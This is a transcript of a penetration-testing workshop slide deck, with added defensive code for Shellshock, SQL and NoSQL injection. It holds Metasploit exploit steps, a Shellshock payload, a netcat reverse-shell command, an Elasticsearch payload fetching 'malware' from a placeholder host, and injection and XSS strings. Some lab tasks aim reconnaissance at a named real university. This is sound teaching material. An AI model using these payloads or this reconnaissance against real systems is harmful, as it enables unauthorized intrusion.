
PenTest 101


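Event: SWALLOW - Project Abyss 2021 Winter Workshop
Course: PenTest 101
Description:
Simulate attacks on computer systems to find exploitable vulnerabilities, and learn how attackers behave in information security by working through an actual penetration test.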

NIghTcAt

July 28, 2021

Transcript

  1. # whoami

    • CSTI Servitor
    • Member of NISRA, NTUST Hack
    • Founder of SIRLA, Project Abyss
    • HITCON Hackdoor Instructor
    • My blog: https://nightcatv.github.io
  10. kali : kali
    • Start up Kali Linux

    $ sudo passwd
    • Change the root password

    root : [password]
    • Log in as root
  11. # apt update
    • Update Kali Linux

    # apt upgrade
    • Upgrade Kali Linux
  15. • Simple to learn, but hard to master
    • Attacks the application layer
    • Classic attacks
      • XSS
      • SQL Injection
  17. • Try to control the program
    • Needs privilege escalation to control the computer
  18. Technical Term

    • Vulnerability: a weakness which can be exploited by a threat actor, such as an attacker, to cross privilege boundaries within a computer system.
    • Attack Surface: the attack surface of a software environment is the sum of the different points where an unauthorized user can try to enter data into, or extract data from, that environment.
    • CVE: Common Vulnerabilities and Exposures
    • CVSS: Common Vulnerability Scoring System
  19. About Penetration Test

    • A penetration test, also known as a pentest, is a simulated cyber attack against a computer system to check for exploitable vulnerabilities.
      • Hardware
      • Website
      • Information system
      • Other equipment
  20. About Penetration Test

    • PTES (Penetration Testing Execution Standard) defines the following main sections:
      • Pre-engagement Interactions
      • Intelligence Gathering
      • Threat Modeling
      • Vulnerability Analysis
      • Exploitation
      • Post Exploitation
      • Reporting
  21. Pre-engagement Interactions

    • Present and explain the tools and techniques available
    • The information within this section is the result of the many years of combined experience of some of the most successful penetration testers in the world
  22. Intelligence Gathering

    • Provides a standard designed specifically for the pentester performing reconnaissance against a target.
    • The intelligence gathering levels are currently split into three categories
  23. Intelligence Gathering Level

    • Level 1
      • Can be obtained almost entirely by automated tools
    • Level 2
      • Uses the automated tools from level 1 plus some manual analysis
    • Level 3
      • Think cultivating relationships on SocNet, heavy analysis, deep understanding of business relationships, most likely a large number of hours to accomplish the gathering and correlation
  24. Threat Modeling

    • Required for correct execution of a penetration test
    • The model used must be consistent in terms of its representation of threats, their capabilities, and their qualifications
      • As per the organization being tested
      • With the ability to be applied repeatedly to future tests with the same results
  25. High level threat modeling process

    • Gather relevant documents
    • Identify and categorize primary and secondary assets
    • Identify and categorize threats and threat communities
    • Map threat communities against primary and secondary assets
  26. Vulnerability Analysis

    • Discovering flaws in systems and applications which can be leveraged by an attacker
      • Host
      • Service misconfiguration
      • Insecure application design
  27. Exploitation

    • Focuses solely on establishing access to a system or resource by bypassing security restrictions
    • Should be a well-planned, precise strike
  28. Post Exploitation

    • Determine the value of the compromised machine
      • By the sensitivity of the data stored on it
      • By the machine's usefulness in further compromise
    • Maintain control of the machine for later use
  29. Phases of post exploitation

    • Understanding the victim
    • Privilege escalation
    • Cleaning tracks and staying undetected
    • Collecting system information and data
    • Setting up backdoors and rootkits
    • Pivoting to penetrate internal networks
  30. Kali Linux

    • Debian-derived Linux distribution
    • Designed for
      • Digital forensics
      • Penetration testing
  31. Metasploit

    • Provides information about security vulnerabilities and aids in penetration testing and IDS signature development
  32. Core Commands
    =============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    features      Display the list of not yet released features that can be opted in to
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers
  33. Module Commands
    ===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index
  34. Burp Suite

    • Essential manual tools
    • Intercept all requests and responses
    • Target site map
    • Automatic modification of responses
  35. Nmap

    • Nmap, network mapper
    • Free and open source
    • Network discovery and security auditing
  36. BeEF

    • Short for the Browser Exploitation Framework
    • A penetration testing tool that focuses on the web browser
  37. What is Shodan

    • A tool for searching devices connected to the internet
    • Common usage:
      • Network Security
      • Market Research
      • Cyber Risk
      • Scanning IoT Devices
      • Tracking Ransomware
  40. # pip3 install shodan
    • Install Shodan

    # shodan init <YOUR API Key>
    • Initialize
  41. Command

    # shodan --help
    • Help

    Usage: shodan [OPTIONS] COMMAND [ARGS]...

    Options:
      -h, --help  Show this message and exit.

    Commands:
      alert       Manage the network alerts for your account
      convert     Convert the given input data file into a different format.
      count       Returns the number of results for a search
      data        Bulk data access to Shodan
      domain      View all available information for a domain
      download    Download search results and save them in a compressed JSON...
      honeyscore  Check whether the IP is a honeypot or not.
      host        View all available information for an IP address
      info        Shows general information about your account
      init        Initialize the Shodan command-line
      myip        Print your external IP address
      org         Manage your organization's access to Shodan
      parse       Extract information out of compressed JSON files.
      radar       Real-Time Map of some results as Shodan finds them.
      scan        Scan an IP/ netblock using Shodan.
      search      Search the Shodan database
      stats       Provide summary information about a search query
      stream      Stream data in real-time.
      version     Print version of this tool.
  42. Command

    # shodan info
    • Information

    # shodan version
    • Version information

    # shodan myip
    • Personal IP address
  43. Command

    # shodan host 1.1.1.1
    • Host information
    • Find the host information, such as
      • Location
      • Opened port
      • Organization
      • etc.
  44. Command

    # shodan search -h
    • Search
    • Default output
      • IP
      • Port
      • Hostname
      • Data

    Usage: shodan search [OPTIONS] <search query>

      Search the Shodan database

    Options:
      --color / --no-color
      --fields TEXT     List of properties to show in the search results.
      --limit INTEGER   The number of search results that should be returned.
                        Maximum: 1000
      --separator TEXT  The separator between the properties of the search
                        results.
      -h, --help        Show this message and exit.
  47. Lab Task

    Find a Fu-Jen University machine
    • Hint:
      • Use Shodan
      • Command: host / search
  49. About Recon-NG

    • Passively searches the open source information of an organization
      • IP address
      • Command Rule
      • Location
      • User
      • etc.
  50. About Recon-NG

    • The tool's modules are classified into groups
      • Discovery
      • Exploitation
      • Import
      • Recon
      • Report
  51. Command

    # recon-ng
    • Startup

    > workspaces create [workspace name]
    • Create a workspace

    > workspaces list
    • Check workspaces
  52. Command

    > marketplace refresh
    • Refresh modules

    > marketplace search [theme]
    • Search modules

    > marketplace install xxx/xxx/xxx
    • Install modules
  53. Lab Task

    Install Modules
    • recon/domains-hosts/bing_domain_web
    • recon/domains-hosts/google_site_web
    • recon/domains-hosts/brute_hosts
    • recon/domains-hosts/netcraft
    • recon/hosts-hosts/resolve
    • recon/hosts-hosts/reverse_resolve
    • discovery/info_disclosure/interesting_files
    • recon/domains-contacts/whois_pocs
    • reporting/html
  54. Lab Task

    Find a Fu-Jen University machine and report it
    • Hint:
      • Use recon-ng
      • Use recon/domains-hosts/google_site_web
      • Use reporting/html
  55. Command

    > modules load reporting/html
    • Load the report module

    > run
    • Execution

    > options set CREATOR fju
    > options set CUSTOMER user
    • Set creator and customer
  57. Google Hacking

    • Uses Google search and other Google applications to find security holes in the configuration and computer code that websites are using
  59. Search Syntax

    allintext
    • Searches for specific text contained on any web page

    allintitle
    • Searches for specific text and shows pages whose titles contain it
  60. Search Syntax

    site
    • Shows the full list of all indexed URLs for the specified domain and subdomain

    inurl
    • The same as allinurl, but only useful for one single keyword
  61. Search Syntax

    filetype
    • Used to search for any kind of file extension

    intitle
    • Used to search for various keywords inside the title

    intext
    • Useful to locate pages that contain certain characters or strings inside their text
  62. Lab Task

    Find a Fu-Jen University URL with a login page
    • Hint:
      • Keyword: fju, login
  63. vsftpd

    • vsftpd: Very Secure FTP Daemon
    • The service is started as a normal user
    • Any command that needs higher privilege is controlled by a special parent process
    • Most commands used in FTP are integrated into vsftpd
  64. Lab Task

    Create a file in the target host
    • Hint:
      • Use Metasploit
      • Use the vsftpd vulnerability
  65. # msfconsole
    • Start up Metasploit

    > use exploit/unix/ftp/vsftpd_234_backdoor
    • Choose the vulnerability

    (exploit/unix/ftp/vsftpd_234_backdoor)> show options
    • Show the options of the vulnerability
  66. (exploit/unix/ftp/vsftpd_234_backdoor)> set RHOST [IP address]
    • Set the Metasploitable 2 IP address

    (exploit/unix/ftp/vsftpd_234_backdoor)> exploit
    • Execute the vulnerability
  67. > uname -a
    • Show the system information

    > touch [file_name]
    • Create a file with an arbitrary name
  68. CVE-2008-4250

    • The Server service allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization
      • Windows 2000 SP4
      • Windows XP SP2 and SP3
      • Windows Server 2003 SP1 and SP2
      • Windows Vista Gold and SP1
      • Windows Server 2008
      • Windows 7 Pre-Beta
  69. What is a buffer overflow?

    [Figure: two rows of adjacent fields of sizes 8, 8 and 16; first row "abcdefgh ij klmnop qrstuvwx yzzzzzzz", second row "abcdefga aaaaaaaa aaaaaaaa aaaaaaaa"]
  70. Lab Task

    Buffer overflow to get the flag
    • Hint:
      • Read the source code
      • Pay attention to the struct
  71. > [any name]
    • Input any username that doesn't exist

    > 11111111111admin
    • Input 11 bits password with the following did
  72. CVE-2008-4250

    • The Server service allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization
      • Windows 2000 SP4
      • Windows XP SP2 and SP3
      • Windows Server 2003 SP1 and SP2
      • Windows Vista Gold and SP1
      • Windows Server 2008
      • Windows 7 Pre-Beta
  73. What is RPC?

    • RPC: Remote Procedure Call
    • A computer program causes a procedure to execute in a different address space, coded as if it were a normal procedure call
  75. Lab Task

    Create a directory in the target host
    • Hint:
      • Use Metasploit
      • Use the MS08-067 vulnerability
  76. # msfconsole
    • Start up Metasploit

    > search ms08-067
    • Search for the vulnerability

    > use exploit/windows/smb/ms08-067_netapi
    • Choose the vulnerability
  77. (exploit/windows/smb/ms08-067_netapi)> show options
    • Show the options of the vulnerability

    (exploit/windows/smb/ms08-067_netapi)> set RHOST [IP address]
    • Set the IP address of the target Windows VM

    (exploit/windows/smb/ms08-067_netapi)> set LHOST [IP address]
    • Set the IP address of Kali Linux
  78. meterpreter> sysinfo
    • Show the system information

    meterpreter> mkdir [directory_name]
    • Create a directory with an arbitrary name
  79. CVE-2014-0160

    • The TLS and DTLS implementations in OpenSSL do not properly handle Heartbeat Extension packets
    • Allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read
  80. What is OpenSSL?

    • A robust, commercial-grade, and full-featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols.
  85. CVE-2014-6271

    • GNU Bash processes trailing strings after function definitions in the values of environment variables
    • Vector:
      • sshd
      • mod_cgi
      • mod_cgid
  86. What is "Bash"?

    • A Unix shell written for the GNU Project as a free software replacement for the Bourne shell (sh)
    • Provides end users an interface to issue system commands and execute scripts
  87. What is "Bash"?

    Environment variable

    # echo $HOME
    /root
    # env | more
    COLORFGBG=15;0
    COLORTERM=truecolor
    ...
  88. What is "Bash"?

    Define a Bash function

    # welcome() { echo "Hi, $USER"; }
    # welcome
    Hi, root
  89. What is "Bash"?

    Define an environment variable

    # export envvar="echo \"Hi, $USER\""
    # bash -c "$envvar"
    Hi, root
  90. How does Shellshock work?

    • Bash incorrectly executes trailing commands when it imports a function definition stored in an environment variable

    () { :; };
  91. How does Shellshock work?

    env x='() { :; }; echo vulnerable' bash -c "cat /etc/passwd"

    • () { :; }; is a legitimate function definition in a Bash environment variable
    • echo vulnerable is the injection of an arbitrary OS command
    • bash -c "cat /etc/passwd" is the Bash command invoked with the on-the-fly defined environment
  92. Shellshock Attack Vectors

    • RCE via Apache with mod_cgi, CGI scripts, Python, Perl
    • RCE on DHCP clients using a hostile DHCP server
    • OpenSSH RCE / privilege escalation
  93. Before we start

    Lab Task
    • Start up the OWASPBWA virtual machine
    • Download the scripts in Kali

    # git clone https://github.com/cheetz/icmpshock /opt/icmpshock
  94. Lab Task

    Make the target machine send a ping packet to Kali
    • Hint:
      • Use the script
      • Start up tcpdump
  95. # cd /opt/icmpshock
    • Change directory

    # chmod +x icmpshock.py
    • Change the permissions of the script
  96. # vi target_list.txt
    • Modify the target list

    > [OWASPBWA IP]
    • Add the target IP to the first line of the file
  97. # tcpdump -nni eth0 -e 'icmp[icmptype] == 8'
    • Start up tcpdump to monitor ICMP

    # python icmpshock.py [Kali Linux IP] target_list.txt
    • Start up the script
  98. Lab Task

    Try to acquire the target shell
    • Hint:
      • Use the script
      • Modify lines 72 to 73 of the script
  99. # vi icmpshock.py
    • Modify the script

    #Command = "/bin/ping -c1 " + LISTENER
    • Comment out line 72

    Command = "/bin/nc.tradition " + LISTENER + " 4444 -e /bin/bash"
    • Uncomment line 73 and modify it
  100. # nc -l -p 4444
    • Start up nc

    # python icmpshock.py [Kali Linux IP] target_list.txt
    • Start up the script
  101. CVE-2015-1427

    • The Elasticsearch engine allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
  102. What is Elastic Search?

    • A search engine based on the Lucene library
    • Developed in Java
    • Provides a distributed, multitenant-capable full-text search engine
      • HTTP web interface
      • Schema-free JSON documents
  103. Feature of Elastic Search

    _search
    • The _search API endpoint allows users to submit Groovy code in the search query itself
    • Allows anybody to submit server-side code to be executed
  104. Feature of Elastic Search

    _search

    {
      "query": {"filtered": {"query": {"match_all": {}}}},
      "script_fields": {"exp": {
        "script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/malware http://x.x.x.x/malware \").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null) {sb.append(str);sb.append(\"\r\n\");}sb.toString();"
      }}
    }
  105. How does the sandbox work?

    • The functions and classes that are allowed by the sandbox are found in GroovySandboxExpressionChecker.java
    • The function isAuthorized takes in an expression and checks whether it is allowed to be executed
  106. How does the sandbox work?

    if (expression instanceof MethodCallExpression) {
        MethodCallExpression mce = (MethodCallExpression) expression;
        String methodName = mce.getMethodAsString();
        if (methodBlacklist.contains(methodName)) {
            return false;
        } else if (methodName == null && mce.getMethod() instanceof GStringExpression) {
            // We do not allow GStrings for method invocation, they are a security risk
            return false;
        }
        // snip
    }
  107. How does the sandbox work?

    Condition: if (methodBlacklist.contains(methodName))

    public static String[] defaultMethodBlacklist = new String[] {
        "getClass",
        "wait",
        "notify",
        "notifyAll",
        "finalize"
    };
  108. How does the sandbox work?

    Condition: if (methodName == null && mce.getMethod() instanceof GStringExpression)
    • Method name is not null
    • Do not use a GStringExpression
  109. How does the sandbox work?

    Restricts the packages

    if (receiversWhiteList != null && !receiversWhiteList.contains(typeName)) {
        throw new SecurityException("Method calls not allowed on [" + typeName + "]");
    } else if (receiversBlackList != null && receiversBlackList.contains(typeName)) {
        throw new SecurityException("Method calls not allowed on [" + typeName + "]");
    }
  110. How does the sandbox work?

    Restricts the packages

    private final static String[] defaultReceiverWhitelist = new String[] {
        groovy.util.GroovyCollections.class.getName(),
        java.lang.Math.class.getName(),
        java.lang.Integer.class.getName(),
        "[I", "[[I", "[[[I",
        //snip
    };
  111. Bypassing the sandbox with reflection

    Load java.lang.Runtime

    $ curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\")"}}}'
    {
      <snip>
      "hits" : {
        "total" : 8,
        "max_score" : 1.0,
        "hits" : [ {
          <snip>
          "fields" : {
            "myscript" : [ "class java.lang.Runtime" ]
          }
        }
    }}
  112. Before we start

    Lab Task
    • Start up the Ubuntu virtual machine
    • Log in with root:root

    # cd elasticsearch-1.4.1/bin
    # ./elasticsearch
  113. # chmod +x ./elastic_shell.py
    • Add execute permission

    # python ./elastic_shell.py [ElasticSearch IP address]
    • Start up the exploit script
  114. What is SQL?

    • SQL: Structured Query Language
    • Used to communicate with a database
    • Common relational database management systems that use SQL
      • Oracle
      • Microsoft SQL Server
      • MariaDB
      • etc.
  115. Basic SQL Syntax

    SELECT [column_name] FROM [table_name] WHERE [condition]

    • [column_name]: column name in the specified table
    • [table_name]: table name in the specified database
    • [condition]: condition that judges whether the value is true or not
  116. SQL Syntax Example

    SELECT user, pass FROM users_data WHERE user='vin'

    • user, pass: column names in the specified table
    • users_data: table name in the specified database
    • user='vin': condition that judges whether the value is true or not
  117. What is SQL Injection?

    $user = $_GET['user'];
    $pass = $_GET['pass'];
    $res = mysql_query("SELECT * FROM users WHERE user='$user' AND pass='$pass'", $link);
  118. What is SQL Injection?

    SELECT * FROM users WHERE user='$user' AND pass='$pass'

    Input: user=asdf pass=asdf

    SELECT * FROM users WHERE user='asdf' AND pass='asdf'
  119. What is SQL Injection?

    SELECT * FROM users WHERE user='$user' AND pass='$pass'

    Input: user=' OR 2=2 -- pass=asdf

    SELECT * FROM users WHERE user='' OR 2=2 -- ' AND pass='asdf'
  125. SELECT * FROM accounts WHERE username='aaaa'' AND password=''

    SELECT * FROM accounts WHERE username='' OR 1=1 -- AND password=''

    Username = ' OR 1=1 --
  128. Lab Task

    Use sqlmap to inject the target page
    • Target: [OWASPBWA IP]/mutillidae/index.php/?page=login.php
    • Hint:
      • Set --data="username=&password=&login-php-submit-button=Login"
  132. SELECT * FROM accounts WHERE username='aaaa'';

    SELECT * FROM accounts WHERE username='' OR ''='';

    Username = ' OR ''='
  137. SELECT * FROM accounts WHERE username='' AND password='';

    SELECT * FROM accounts WHERE username='' OR ''='' AND password='' OR ''='';

    Username = ' OR ''='
    Password = ' OR ''='
  140. About NoSQL

    • Also called "non-SQL" or "non-relational SQL"
    • Differs from traditional relational SQL databases
  141. Scope

    Based on OWASP 2016

    Database     Type              Ranking
    MongoDB      Document store    5
    Redis        Key-value store   9
    Memcached    Key-value store   23
    CouchDB      Document store    26
  142. Basic Syntax

    Use MongoDB as example

    db.users.find({name: "duran"}, {name: 1, address: 1}).limit(5)

    Labelled parts: Database Name • Collection Name • Query • Projection • Modifier
  143. What is NoSQL Injection?

    {
      "username": { "$ne": "[email protected]" },
      "password": { "$ne": "mymaliciouspassword" }
    }

    • A web application receives the username and password as JSON
  144. What is NoSQL Injection?

    Model.findOne(req.body)
    // or
    Model.findOne({ username: req.body.username, password: req.body.password });
  145. What is NoSQL Injection?

    Model.findOne({
      username: { $ne: "[email protected]" },
      password: { $ne: "mymaliciouspassword" }
    });
  146. Known Attack Method

    Based on OWASP 2016
    • Login bypass for MongoDB on PHP and NodeJS
    • String concatenation for JSON and script
    • Escaping flaws of drivers
  147. OWASP Web Application Security Risk Top 10 (2013)

    1 Injection
    2 Broken Authentication and Session Management
    3 Cross-site Scripting (XSS)
    4 Insecure Direct Object References
    5 Security Misconfiguration
    6 Sensitive Data Exposure
    7 Missing Function Level Access Control
    8 Cross-site Request Forgery (CSRF)
    9 Using Components with Known Vulnerabilities
    10 Unvalidated Redirects and Forwards

    OWASP Web Application Security Risk Top 10 (2017)

    1 Injection
    2 Broken Authentication
    3 Sensitive Data Exposure
    4 XML External Entities (XXE)
    5 Broken Access Control
    6 Security Misconfiguration
    7 Cross-site Scripting (XSS)
    8 Insecure Deserialization
    9 Using Components with Known Vulnerabilities
    10 Insufficient Logging & Monitoring
  148. About XSS

    • Cross-site scripting (XSS) is a web vulnerability that allows an attacker to compromise the interactions users have with a vulnerable application.
    • Normally allows an attacker to masquerade as a victim user and carry out any actions that the user is able to perform.
  149. XSS Type

    • Reflected XSS
      • The malicious script comes from the current HTTP request
    • Stored XSS
      • The malicious script comes from the website's database
    • DOM-based XSS
      • The vulnerability exists in client-side code rather than server-side code
  150. What is reflected XSS?

    • The simplest variety of cross-site scripting.
    • An application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
  151. http://insecure-website.com/search?term=<script>/* Bad stuff here… */</script>

    Search "<script>/* Bad stuff here… */</script>"

    <p> You searched for: <script>/* Bad stuff here… */</script> </p>
  152. What is stored XSS?

    • Also known as persistent or second-order XSS
    • Arises when the application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.
  153. Before we start

    Lab Task
    • Install the BeEF exploitation framework

    # git clone https://github.com/beefproject/beef /opt/beef
    # cd /opt/beef
    # ./install
    # vi config.yaml
    > user: "beef"
    > passwd: "[any string]"
    • Change the default user and password
  154. Before we start

    Lab Task
    • Visit the user interface at http://127.0.0.1:3000/ui/authentication
    • Log in with beef:beef
    • Visit hook.js
  156. Lab Task

    Use XSS to hook the malicious script
    • Target: [OWASPBWA IP]/owaspbricks
    • Hint:
      • Read the page source carefully to find where the website pastes the text directly
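
Detection for the Shellshock slides (90 to 92 and the CGI lab), as an added example that is not part of the original deck: a scanner that flags web access log entries whose Referer or User-Agent value begins with the `() {` function-definition prefix from slide 90. It assumes the common "combined" log format; the log lines, addresses and function names are constructed for illustration.

```python
import re

# Apache/Nginx "combined" format (assumed):
#   host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field, tolerating \" escapes
LOG_RE = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED
)

# Bash only imported a function when the variable's value *began* with "() {",
# so the header check is anchored at the start of the value.
STARTS_FUNC_DEF = re.compile(r'\s*\(\s*\)\s*\{')
# Fallback for lines that do not parse: a quoted field opening with the prefix.
QUOTED_FUNC_DEF = re.compile(r'"\s*\(\s*\)\s*\{')

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Jul/2021:10:00:01 +0800] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.10 - - [28/Jul/2021:10:00:05 +0800] "GET /cgi-bin/status HTTP/1.1" '
    '200 0 "-" "() { :; }; /bin/ping -c1 192.0.2.10"',
    '192.0.2.10 - - [28/Jul/2021:10:00:09 +0800] "GET /cgi-bin/status HTTP/1.1" '
    '200 0 "() { :; }; echo vulnerable" "curl/7.74.0"',
    '198.51.100.7 - - [28/Jul/2021:10:00:12 +0800] "GET /docs HTTP/1.1" '
    '200 90 "https://example.test/docs?fn=init(){" "curl/7.74.0"',
    # Malformed entry (fields missing): must not slip past the scanner.
    '192.0.2.10 - - [28/Jul/2021:10:00:20 +0800] "GET /cgi-bin/status HTTP/1.1" '
    '200 "() { :; }; echo vulnerable"',
]


def scan(lines):
    """Return (line number, client host, field) for every suspicious entry."""
    findings = []
    for number, line in enumerate(lines, start=1):
        parsed = LOG_RE.match(line)
        if parsed is None:
            # Unparseable lines are still searched instead of being skipped.
            if QUOTED_FUNC_DEF.search(line):
                findings.append((number, line.split(" ", 1)[0], "unparsed"))
            continue
        host, _request, referer, agent = parsed.groups()
        for name, value in (("referer", referer), ("agent", agent)):
            if STARTS_FUNC_DEF.match(value):
                findings.append((number, host, name))
    return findings


if __name__ == "__main__":
    for number, host, field in scan(SAMPLE_LOG):
        print(f"line {number}: {host} sent a function-definition prefix in {field}")
```

Headers that the combined format does not record, such as Cookie, need a custom log format or a packet capture to be covered the same way.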
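
The login query from the SQL injection slides (117 to 119, 132 and 137), as an added example that is not part of the original deck: the slide's string-built statement beside a parameterized one, both fed the inputs shown on the slides. SQLite stands in for MySQL here, and the sample row and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data; table and column names follow the slide's query."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('vin', 'not-the-real-password')")
    return db


def login_concat(db, user, password):
    """Vulnerable: input is pasted into the SQL text, the same pattern as the
    mysql_query() call on slide 117."""
    sql = f"SELECT * FROM users WHERE user='{user}' AND pass='{password}'"
    return db.execute(sql).fetchall()


def login_param(db, user, password):
    """Hardened: the statement text is fixed and input travels as bound values,
    so quotes and comment markers in it stay data and never become SQL syntax."""
    sql = "SELECT * FROM users WHERE user=? AND pass=?"
    return db.execute(sql, (user, password)).fetchall()


# Inputs taken from the slides.
SLIDE_INPUTS = [
    ("asdf", "asdf"),            # ordinary wrong credentials (slide 118)
    ("' OR 2=2 -- ", "asdf"),    # comments out the password check (slide 119)
    ("' OR ''='", "' OR ''='"),  # makes both comparisons true (slide 137)
]


def compare(db):
    """Return (user input, rows via concatenation, rows via bound parameters)."""
    return [
        (user, len(login_concat(db, user, pw)), len(login_param(db, user, pw)))
        for user, pw in SLIDE_INPUTS
    ]


if __name__ == "__main__":
    for user, concat_rows, param_rows in compare(make_db()):
        print(f"{user!r:16} concatenated={concat_rows} parameterized={param_rows}")
```

A row count above zero means the login would be accepted, so the two injected inputs succeed only against the concatenated statement.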
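
The login bypass from the NoSQL injection slides (143 to 145), as an added example that is not part of the original deck: a handler that passes JSON fields straight into the query, beside one that accepts only string credentials. The `matches` and `find_one` functions are a simplified stand-in for MongoDB matching that models only equality and `$ne`; the user record, request bodies and function names are constructed.

```python
import json

# Constructed sample collection standing in for a MongoDB users collection.
USERS = [{"username": "alice", "password": "correct horse battery"}]


def matches(doc, query):
    """Simplified MongoDB-style matching: plain equality plus the $ne operator."""
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict) and any(k.startswith("$") for k in cond):
            for op, arg in cond.items():
                if op != "$ne":
                    raise ValueError(f"operator {op} is not modelled here")
                if value == arg:
                    return False
        elif value != cond:
            return False
    return True


def find_one(query):
    return next((doc for doc in USERS if matches(doc, query)), None)


def login_unsafe(raw_body):
    """Mirrors Model.findOne({username: req.body.username, ...}) from slide 144:
    whatever JSON type the client sent goes straight into the query."""
    body = json.loads(raw_body)
    return find_one({"username": body.get("username"),
                     "password": body.get("password")})


def login_checked(raw_body):
    """Accepts only string credentials, so an object such as {"$ne": ...}
    can never reach the database as a query operator."""
    body = json.loads(raw_body)
    if not isinstance(body, dict):
        return None
    user, password = body.get("username"), body.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        return None
    return find_one({"username": user, "password": password})


# Constructed request bodies; OPERATOR_BODY has the shape shown on slide 143.
GOOD_BODY = json.dumps({"username": "alice", "password": "correct horse battery"})
WRONG_BODY = json.dumps({"username": "alice", "password": "guess"})
OPERATOR_BODY = json.dumps({
    "username": {"$ne": "nobody@example.invalid"},
    "password": {"$ne": "mymaliciouspassword"},
})

if __name__ == "__main__":
    for label, body in (("good", GOOD_BODY), ("wrong", WRONG_BODY),
                        ("operator", OPERATOR_BODY)):
        print(label, "unsafe:", login_unsafe(body) is not None,
              "checked:", login_checked(body) is not None)
```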